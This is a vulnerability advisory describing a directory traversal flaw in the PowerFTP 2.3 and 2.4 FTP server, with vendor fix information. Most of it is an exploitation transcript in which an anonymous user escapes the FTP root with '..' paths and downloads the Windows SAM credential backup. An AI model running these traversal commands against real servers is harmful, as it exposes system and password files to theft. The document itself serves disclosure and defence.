Directory Traversal vulnerability found in PowerFTP 2.24 from CooolSoft Discovered by Dennis Rand ------------------------------------------------------------------------ -----[SUMMARY PowerFTP is a powerful FTP client/server software. The best feature of PowerFTP is the function of multiple thread downloading and uploading. it can even split one big file into several parts, and download each part at one time! With PowerFTP, you will get the FASTEST transferring speed! Another good feature of this product is Personal FTP server. it can make your computer as a standard FTP server. You can add or remove account, edit share directory accessing permission. A vulnerability in the product allows remote attackers to cause the server to traverse into directories that reside outside the bounding FTP root directory, reading files, getting files and perform a DoS attack on the server. -----[DETAILS Vulnerable systems: * PowerFTP version 2.4 * PowerFTP version 2.3 * My guess the previous versions are vulnerable to. Immune systems: * PowerFTP version 2.5 PowerFTP failure to filter out the "\.." and "/.." sequences in some command requests allows remote users to break out of restricted directories and gain read access to the system directory structure; Possibility for getting files from outside restricted areas. The following transcript demonstrates a sample exploitation of the vulnerabilities: C:\data\Private\Maximum\der\advisories>ftp ftp> open To 192.168.1.199 Connected to 192.168.1.199. 220 Personal FTP Server ready User (192.168.1.199:(none)): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp> ls 200 Port command successful. 150 Opening data connection for directory list. . .. iissamples scripts wwwroot 226 File sent ok ftp: 37 bytes received in 0,00Seconds 37000,00Kbytes/sec. ftp> cd .. 250 CWD command successful. "C:/Inetpub/" is current directory. ftp> cd ... 250 CWD command successful. "C:/Inetpub/" is current directory. ftp> ls 200 Port command successful. 150 Opening data connection for directory list. . .. iissamples scripts wwwroot 226 File sent ok ftp: 37 bytes received in 0,00Seconds 37000,00Kbytes/sec. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 . drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 .. drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 iissamples drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 scripts drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 wwwroot 226 File sent ok ftp: 307 bytes received in 0,00Seconds 307000,00Kbytes/sec. ftp> dir \..\..\ 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Jan 18 18:48 1308 FTP -rwxrwxrwx 1 ftp ftp 0 Dec 23 2002 AUTOEXEC.BAT -r--r--r-- 1 ftp ftp 278 Jan 18 08:49 boot.ini -rw-rw-rw- 1 ftp ftp 0 Dec 23 2002 CONFIG.SYS dr--r--r-- 1 ftp ftp 0 Dec 23 2002 I386 drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 Inetpub drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 Installationsfiler til Windows Update drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 Multimedia Files drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 OptionPack -rw-rw-rw- 1 ftp ftp 524288000 Jan 18 18:17 pagefile.sys drw-rw-rw- 1 ftp ftp 0 Jan 18 18:48 Program Files drw-rw-rw- 1 ftp ftp 0 Jan 18 18:53 TEMP -rw-rw-rw- 1 ftp ftp 0 Jan 18 19:00 test.txt drw-rw-rw- 1 ftp ftp 0 Jan 18 18:36 WINNT 226 File sent ok ftp: 938 bytes received in 0,02Seconds 46,90Kbytes/sec. ftp> dir /../../ 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Jan 18 18:48 1308 FTP -rwxrwxrwx 1 ftp ftp 0 Dec 23 2002 AUTOEXEC.BAT -r--r--r-- 1 ftp ftp 278 Jan 18 08:49 boot.ini -rw-rw-rw- 1 ftp ftp 0 Dec 23 2002 CONFIG.SYS dr--r--r-- 1 ftp ftp 0 Dec 23 2002 I386 drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 Inetpub drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 Installationsfiler til Windows Update drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 Multimedia Files drw-rw-rw- 1 ftp ftp 0 Dec 23 2002 OptionPack -rw-rw-rw- 1 ftp ftp 524288000 Jan 18 18:17 pagefile.sys drw-rw-rw- 1 ftp ftp 0 Jan 18 18:48 Program Files drw-rw-rw- 1 ftp ftp 0 Jan 18 18:53 TEMP -rw-rw-rw- 1 ftp ftp 0 Jan 18 19:00 test.txt drw-rw-rw- 1 ftp ftp 0 Jan 18 18:36 WINNT 226 File sent ok ftp: 938 bytes received in 0,10Seconds 9,38Kbytes/sec. ftp> get \..\..\winnt\repair\sam._ 200 Port command successful. 150 Opening data connection for \..\..\winnt\repair\sam._. 226 File sent ok ftp: 3196 bytes received in 0,26Seconds 12,25Kbytes/sec. ftp> get /../../Winnt/repair/sam._ 200 Port command successful. 150 Opening data connection for /../../Winnt/repair/sam._. 226 File sent ok ftp: 3196 bytes received in 0,01Seconds 319,60Kbytes/sec. ftp> bye 221 Goodbye. -----[DETECTION PowerFTP version 2.3 and 2.4 is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript. -----[VENDOR RESPONSE PowerFTP version 2.5 fixes this issue. The latest version is available from http://www.cooolsoft.com/powerftp.htm -----[ADDITIONAL INFORMATION The vulnerability was discovered by Dennis Rand -----[DISCLAIMER The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.